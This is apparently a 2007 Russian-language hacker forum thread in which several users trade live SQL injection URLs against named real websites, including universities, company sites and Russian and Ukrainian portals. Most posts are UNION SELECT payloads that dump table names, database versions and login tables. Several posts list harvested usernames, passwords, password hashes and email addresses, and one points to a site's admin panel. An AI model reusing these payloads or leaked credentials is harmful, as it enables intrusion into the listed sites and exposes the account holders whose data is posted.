http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+81,1/*
Таблиц там 81, нашел более менее интересные:
users:
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11+f rom+information_schema.columns+where+table_name=ch ar(117,115,101,114,115)+limit+0,1/*
svegak_singers_news:
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11+f rom+information_schema.columns+where+table_name=ch ar(115,118,101,103,97,107,95,115,105,110,103,101,1 14,115,95,110,101,119,115)+limit+0,1/*
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,concat(id,char(58),singerid,cha r(58),newsid),4,5,6,7,8,9,10,11+from+svegak_singer s_news+limit+0,1/*
svegak_subscr_users:
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,column_name,4,5,6,7,8,9,10,11+f rom+information_schema.columns+where+table_name=ch ar(115,118,101,103,97,107,95,115,117,98,115,99,114 ,95,117,115,101,114,115)+limit+0,1/*
http://museon.ru/sbnews/index.php?a=viewnews&news=-1+union+select+1,2,concat(u_id,char(58),confirmcod e,char(58),confirmcheck,char(58),email),4,5,6,7,8, 9,10,11+from+svegak_subscr_users+limit+0,1/*
[53x]Shadow
19.05.2007, 04:08
Продолжаем тему выпускников.
В этот раз Ассоциация выпускников ТПУ(Томск).
alumni.tpu.ru
Первый раз сталкиваюсь с БД ORACLE в таких проектах :)
Короче смог подобрать количество столбцов = 41
http://alumni.tpu.ru/showitem.php?id=688'+union+select+null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null+from+sys.du al--
А так же удалось вытащить имя одной таблицы VIPUSKNIKI и одного столбца в ней USER
http://alumni.tpu.ru/showitem.php?id=-12
Но на этом все :( , то ли отображаемых столбцов нет, толи потому что оракул у мя в первый раз короче дальше хз...
Млин да и вообще уже скули снится стали, пора завязывать;)
http://rpitv.union.rpi.edu/news.php?newsid=-5+union+select+TABLE_NAME,2,3,4+from+INFORMATION_S CHEMA.TABLES+limit+26,1
http://rpitv.union.rpi.edu/news.php?newsid=-5+union+select+concat_ws(0x3a,username,password,em ail),2,3,4+from+member+limit+1,1
clarka3:hiSeGxynSh85I:clarka3@rpi.edu
=======================================
http://www.geology.ohio-state.edu/news_detail.php?newsId=-1+union+select+1,2,concat_ws(0x3a,user,password),4 ,5,6+from+mysql.user+limit+1,1
http://www.geology.ohio-state.edu/news_detail.php?newsId=-1+union+select+1,2,concat_ws(0x3a,user,password),4 ,5,6+from+mysql.user+limit+2,1
root:
michael:1cd219690c8c93cd
=======================================
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,username ,password),8,9,10,11,12,13,14,15,16,17,18,19,20+fr om+users+limit+1,1
Matt:Grape$
=======================================
VampiRUS
19.05.2007, 12:03
http://www.psihologu.ru/index.php?action=refall&p=NjUzNCB1bmlvbiBzZWxlY3QgVVNFUigpLyo=
прикольная скуля, жалко слепая, и таблиц не подобрал(
base64(6534 union select USER()/*)=NjUzNCB1bmlvbiBzZWxlY3QgVVNFUigpLyo=
www.toyota.com.tw
http://www.toyota.com.tw/vehicle/vehicle_index.asp?CategoryID=216'
Серенький
19.05.2007, 13:08
sakha.net Саха(Якутия)
http://sakha.net/?s=news&ncat=-9+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,user(),version(),database()),0x55),0x55),4 ,5,6,7,8,9,0,1,2,3,4,5/*
ForWarD-Hack
19.05.2007, 13:49
http://www.email.ee/atmail.pl?username='UNION%20SELECT%201,2,3/**&pop3host=email.ee сам не копался но скуль там есть :)
http://www.defa.ru/tv/porto/index.php?idc=213&cc=1&idw=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11,12,13/*
http://www.vkf.ru/index.php?action=prod&type=detail&id=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6,7,8,9,10,11/*
http://www.skazki.org.ru/pda/view.php?id=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3,4,5/*
_Pantera_
20.05.2007, 00:42
http://www.jahireisid.ee/index.php?id=-3+union+select+AES_DECRYPT(AES_ENCRYPT(version(),0 x78),0x78)/*
http://www.garmin.ee/index.php?ID=-3+union+select+pageType,pageFile,3,4+from+menu/*
KPOT_f!nd
20.05.2007, 00:44
http://inkaluga.ru/econ_mun/review.php?id=-51+union+select+concat(user(),0x3a,version(),0x3a, database())/*
http://www.fin.org.ua/newws.php?i=51002+union+select+1,database(),user() ,version(),5+from+users/*
[53x]Shadow
20.05.2007, 02:04
University of Maryland
www.umd.edu
Опять на Oracle нарвался, вот мне везет, но на ентот раз получилось хотя бы вычислить принтабильные столбцы
http://www.newsdesk.umd.edu/uniini/release.cfm?ArticleID=-1+union+select+1,null,null,null,sys.login_user+fro m+sys.dual--
BlackCats
20.05.2007, 02:46
ы
http://www.is4ie.org/dynamic/listing.php?id=21+order+by+13
ы
Dracula4ever
20.05.2007, 09:38
http://www.nasheradio.net
http://www.nasheradio.net/news2.php?id=1'+union+select+1,concat(user(),char( %20%2058),database(),char(58),version()),3,4,5,6,7 ,8,9,1%20%200,11,12/*
http://www.promtractor.ru
http://www.promtractor.ru/products_show.php?section=-1+union+select+1,2,version(),4/*
http://www.presscenter.kz/index.php?show=news&id=-1+union+select+1,2,convert(concat(database(),char( 58),user(),char(58),version()),char),4,5,6,7,8,9/*
http://www.presscenter.kz/index.php?show=news&id=-1+union+select+1,2,convert(table_name,char),4,5,6, 7,8,9+from+information_schema.tables+limit+19,1/*
http://www.presscenter.kz/index.php?show=news&id=-1+union+select+1,2,concat(autorID,char(58),name,ch ar(58),email,char(58),description,char(58),photo,c har(58),positions),4,5,6,7,8,9+from+news_autors+li mit+0,1/*
http://www.kreschatic.kiev.ua/?id=3057+union+se lect+1,concat(user,p assword)+from+my sql.user/*
http://www.sistema. kz/?start=product&id= -1+union+select+1,password,login,4,5+from+admin+lim it+0,1/*
http://www.aquaclub.cz/ article.php?id=-1+union+select+1,2,3, 4,5,6,7,8,9,concat(user(),char(58),version()),11+f rom+INFORMATION_SCHEMA.TABLES/*
http://searchmonster. org/index.php?l=-1+union+select+1,2,3,user,password ,6+from+mysql.user/*
Серенький
20.05.2007, 22:49
http://hachoo.ru/ Дарить и получать подарки!
уязвимость: http://hachoo.ru/tag.php?tag=130'
таблицы и поля: user (login,password,email)
842 записи
root:f5d7e2532cc9ad16bc2a41222d76f269: businesshttp://hachoo.ru/tag.php?tag=-130'+union+select+1,concat_ws(0x3a,login,password, email)+from+user+limit+1,1/*
KPOT_f!nd
20.05.2007, 23:52
http://www.asinfo.com.ua/azov/az_forum_mess.php?id=-10+union+select+concat(user(),0x3a,version(),0x3a, database()),2/*&pg=
http://www.asinfo.com.ua/azov/az_forum_mess.php?id=-10+union+select+concat(name,0x3a,email),2+from+gbo ok/*&pg=
нашел одну таблицу: news
http://www.dosug.zp.ua/?go=ob&vidb=-1+union+select+email,url,3,icq,gorod,6,7,8+from+me mbers/*
также вместо email/url/icq/gorod/ - можно подставить about/profession/education/lookinginfo
http://www.nhia.edu/news.php?id=-13+union+select+1,2,3,convert(concat(user(),0x3a,v ersion(),0x3a,database())+using+latin1),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ news/*
thank ettee(соучастник)
Серенький
21.05.2007, 00:11
http://www.color-foto.com/
http://www.color-foto.com/index.php?p=-43'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,conca t_ws(0x3a,user(),version(),database()),6,7+from+co ntent/*
Dracula4ever
21.05.2007, 12:09
http://www.sofiacityguide.com
http://www.sofiacityguide.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.pizzamarketplace.com
http://www.pizzamarketplace.com/article.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*
Серенький
21.05.2007, 16:45
скулечка
http://www.safemaster.ru/
admins(login,pass)
http://www.safemaster.ru/info.php?id=-468+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,concat(login,0x3a,pass)+from+admins+limit+0,1/*пасы открытые:
admin:3362278811
админкаhttp://www.safemaster.ru/admin/
http://krolik.ru/sex/list.php?tid=-1+union+select+1,convert(concat(database(),char(58 ),user(),char(58),version()),char),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20/*
http://krolik.ru/sex/list.php?tid=-1+union+select+1,concat(id,char(58),name,char(58), pass,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+autors+limit+600,1/*
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot